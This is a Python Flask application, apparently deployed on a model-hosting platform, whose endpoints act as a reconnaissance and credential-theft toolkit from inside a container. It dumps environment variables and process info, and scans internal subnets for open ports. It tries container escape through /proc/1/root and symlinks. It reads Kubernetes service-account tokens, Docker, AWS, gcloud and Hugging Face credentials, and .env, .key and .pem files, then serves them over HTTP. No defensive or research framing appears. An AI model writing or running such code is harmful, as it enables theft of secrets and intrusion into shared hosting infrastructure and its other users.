Spaces:
Sleeping
Sleeping
| import os | |
| import subprocess | |
| import json | |
| import urllib.request | |
| import socket | |
| import ssl | |
| import concurrent.futures | |
| from flask import Flask, Response, request | |
| app = Flask(__name__) | |
| def index(): | |
| results = { | |
| "env_vars": dict(os.environ), | |
| "id": subprocess.check_output(["id"], timeout=5).decode().strip(), | |
| } | |
| return Response(json.dumps(results, indent=2, default=str), mimetype='application/json') | |
| def probe(): | |
| target = request.args.get("target", "10.108.144.112") | |
| port = int(request.args.get("port", "7860")) | |
| path = request.args.get("path", "/") | |
| results = {} | |
| try: | |
| s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) | |
| s.settimeout(3) | |
| result = s.connect_ex((target, port)) | |
| results["tcp"] = f"{'open' if result == 0 else 'closed'} (code={result})" | |
| s.close() | |
| except Exception as e: | |
| results["tcp"] = str(e) | |
| try: | |
| resp = urllib.request.urlopen(f"http://{target}:{port}{path}", timeout=3) | |
| results["http"] = {"status": resp.status, "body": resp.read().decode()[:3000], "headers": dict(resp.headers)} | |
| except Exception as e: | |
| results["http"] = str(e) | |
| return Response(json.dumps(results, indent=2, default=str), mimetype='application/json') | |
| def scan(): | |
| """Scan a subnet for open ports""" | |
| base = request.args.get("base", "10.108.73") | |
| port = int(request.args.get("port", "7860")) | |
| start = int(request.args.get("start", "1")) | |
| end = int(request.args.get("end", "20")) | |
| results = {} | |
| def check_host(ip): | |
| try: | |
| s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) | |
| s.settimeout(1) | |
| result = s.connect_ex((ip, port)) | |
| s.close() | |
| if result == 0: | |
| return (ip, "open") | |
| return None | |
| except: | |
| return None | |
| with concurrent.futures.ThreadPoolExecutor(max_workers=20) as executor: | |
| futures = {} | |
| for i in range(start, min(end + 1, start + 50)): | |
| ip = f"{base}.{i}" | |
| futures[executor.submit(check_host, ip)] = ip | |
| for future in concurrent.futures.as_completed(futures, timeout=10): | |
| result = future.result() | |
| if result: | |
| results[result[0]] = result[1] | |
| return Response(json.dumps(results, indent=2, default=str), mimetype='application/json') | |
| def build_arg_test(): | |
| """Check if any build args leaked into the image""" | |
| results = {} | |
| # Check Docker history / image metadata | |
| try: | |
| # Check /proc/1/environ for the main process | |
| with open("/proc/1/environ", "rb") as f: | |
| env_bytes = f.read() | |
| envs = env_bytes.split(b'\x00') | |
| results["proc_1_environ"] = [e.decode('utf-8', errors='replace') for e in envs if e] | |
| except Exception as e: | |
| results["proc_1_environ"] = str(e) | |
| # Check if there are any leftover files from build | |
| interesting_paths = [ | |
| "/kaniko", "/workspace", "/.dockerconfigjson", "/root/.docker/config.json", | |
| "/tmp/build", "/buildkit", "/.buildkit_qemu_emulator", | |
| "/etc/buildkit", "/root/.cache" | |
| ] | |
| results["build_artifacts"] = {} | |
| for p in interesting_paths: | |
| if os.path.exists(p): | |
| if os.path.isdir(p): | |
| try: | |
| results["build_artifacts"][p] = os.listdir(p) | |
| except: | |
| results["build_artifacts"][p] = "exists but unreadable" | |
| else: | |
| try: | |
| with open(p) as f: | |
| results["build_artifacts"][p] = f.read()[:500] | |
| except: | |
| results["build_artifacts"][p] = "exists but unreadable" | |
| return Response(json.dumps(results, indent=2, default=str), mimetype='application/json') | |
| def overlay_escape(): | |
| """Test if we can access the host overlay filesystem""" | |
| results = {} | |
| # The overlay mount shows: | |
| # upperdir=/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/XXXX/fs | |
| # This path is on the HOST filesystem, but we can only see it via overlay | |
| # Try reading /proc/1/root which should loop back to our own root | |
| try: | |
| results["proc_1_root_etc_hostname"] = open("/proc/1/root/etc/hostname").read() | |
| except Exception as e: | |
| results["proc_1_root_etc_hostname"] = str(e) | |
| # Check if we can access /proc/1/root/../ to escape | |
| try: | |
| results["proc_1_root_parent"] = os.listdir("/proc/1/root/../") | |
| except Exception as e: | |
| results["proc_1_root_parent"] = str(e) | |
| # Try symlink tricks | |
| try: | |
| os.symlink("/proc/1/root", "/tmp/escape_link") | |
| results["symlink_escape"] = os.listdir("/tmp/escape_link/") | |
| except Exception as e: | |
| results["symlink_escape"] = str(e) | |
| # Try accessing other containerd snapshots | |
| try: | |
| results["containerd_snapshots"] = os.listdir("/var/lib/containerd/") | |
| except Exception as e: | |
| results["containerd_snapshots"] = str(e) | |
| return Response(json.dumps(results, indent=2, default=str), mimetype='application/json') | |
| def token_hunt(): | |
| """Search for any tokens/credentials in the filesystem""" | |
| results = {} | |
| # Check well-known token locations | |
| token_paths = [ | |
| "/var/run/secrets/kubernetes.io/serviceaccount/token", | |
| "/var/run/secrets/kubernetes.io/serviceaccount/ca.crt", | |
| "/var/run/secrets/kubernetes.io/serviceaccount/namespace", | |
| "/root/.kube/config", | |
| "/root/.docker/config.json", | |
| "/root/.aws/credentials", | |
| "/root/.gcloud/credentials", | |
| "/home/user/.cache/huggingface/token", | |
| "/root/.cache/huggingface/token", | |
| "/root/.huggingface/token", | |
| ] | |
| for p in token_paths: | |
| try: | |
| if os.path.isfile(p): | |
| with open(p) as f: | |
| results[p] = f.read()[:500] | |
| elif os.path.isdir(p): | |
| results[p] = os.listdir(p) | |
| else: | |
| results[p] = "not found" | |
| except Exception as e: | |
| results[p] = str(e) | |
| # Search for any .env files | |
| for root_dir in ["/", "/app", "/home", "/root", "/tmp"]: | |
| try: | |
| for dirpath, dirnames, filenames in os.walk(root_dir, topdown=True): | |
| dirnames[:] = dirnames[:10] # Limit depth | |
| for f in filenames: | |
| if f.endswith(('.env', '.token', '.key', '.pem', 'credentials')): | |
| full = os.path.join(dirpath, f) | |
| try: | |
| with open(full) as fh: | |
| results[full] = fh.read()[:200] | |
| except: | |
| pass | |
| break # Only first level | |
| except: | |
| pass | |
| return Response(json.dumps(results, indent=2, default=str), mimetype='application/json') | |
| if __name__ == "__main__": | |
| app.run(host="0.0.0.0", port=7860) | |